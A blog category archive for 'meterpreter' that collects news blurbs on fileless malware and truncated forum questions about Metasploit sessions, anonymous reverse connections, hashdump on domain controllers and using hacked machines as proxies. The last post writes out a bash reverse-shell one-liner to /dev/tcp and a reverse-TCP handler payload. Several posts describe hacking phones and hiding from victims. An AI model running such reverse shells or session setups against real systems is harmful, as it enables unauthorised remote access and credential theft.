Hard Target: Fileless Malware
Researchers say fileless in-memory malware attacks have become a major nuisance to businesses and have become even harder to detect and defend. Continue reading Hard Target: Fileless Malware
Category Archives: meterpreter
Can a meterpreter session be reopened?
I tried to hack multiple android phones using .apk files but everytime the session lasts 5-10 seconds:
[*] 94.243.71.172 – Meterpreter session 1 closed. Reason: Died
Then, to open a new session I need to uninstall and… Continue reading Can a meterpreter session be reopened?
How can clicking on a URI infect a host?
I watched a generic information security awareness presentation earlier, in which all that was required for the presenter to penetrate an organisation (with a meterpreter/reverse shell), was for someone on the inside to click… Continue reading How can clicking on a URI infect a host?
Meterpreter (Metasploit) anonymous reverse connection over Tor2web
The general consensus seems to be that one sets up a listener on a server accessible by a public IP and some port forwarding. For anonymity this should be a throw-away server or a hacked box.
I’ve been trying to make a reverse connection … Continue reading Meterpreter (Metasploit) anonymous reverse connection over Tor2web
Does hashdump also dump domain creds when run on a domain controller
If I understand correctly, meterpreter’s hashdump dumps the content of the SAM file. Domain users should be in the AD database on domain controllers, which I understand is NTDS.dit .
On my test network, if I run hashdump on … Continue reading Does hashdump also dump domain creds when run on a domain controller
Can we attack with and target the same computer
Recently I have gained interest in Kali, especially frameworks such as Metasploit. Let’s assume that I only have one computer that does not have access to the internet. I want to learn how to use tools and frameworks in Kali … Continue reading Can we attack with and target the same computer
Use a hacked client as a proxy?
My idea is to use some kind of “tunneling” (i only know DNS, SSH and ICMP) to use a hacked machine (this machine is supposed to have access to internet). So, basically I think this hacked machine will work as a proxy.
Is this… Continue reading Use a hacked client as a proxy?
Fileless Malware Campaigns Tied to Same Attacker
Two recent fileless malware campaigns targeting financial institutions, government agencies and other enterprises have been linked to the same attack group. Continue reading Fileless Malware Campaigns Tied to Same Attacker
How to prevent multiple meterpreter sessions from same target?
The payload I use connects back to the handler at specified time interval. When I use exploit as a job, I get multiple sessions from the same target using different ports.
I want the handler to refuse the session from a targ… Continue reading How to prevent multiple meterpreter sessions from same target?
Setup a meterpreter session trough a vpn
this is my first post here.
I was trying to start a meterpreter session from a mac to my kali Linux machine trough a vpn but it isn’t working.
I downloaded openVPN config files from vpnbook.com and started my vpn by typing “openvpn –config (path to config file)”. Then it gave me a few different ip addresses, one address which always stays the same (when I disconnect and reconnect) and is also shown when I go to whatsmyip.com, and another one that is always different.
Could someone explain what the difference is and how I would setup a meterpreter session trough that vpn (or another solution, the main goal is to not have my public ip visible on the victims machine).
Note: I don’t think it really matters but to connect from the mac, I just open a terminal and type: “bash -i >& /dev/tcp/ip-address/port 0>&1 2>&”
On my Linux machine I use this payload when setting up the handler: “osx/x64/shell_reverse_tcp” and once I get a session (it does work when I enter my public ip and set up port forwarding), I upgrade it to a meterpreter session using “sessions -u session-ID”
Cecemel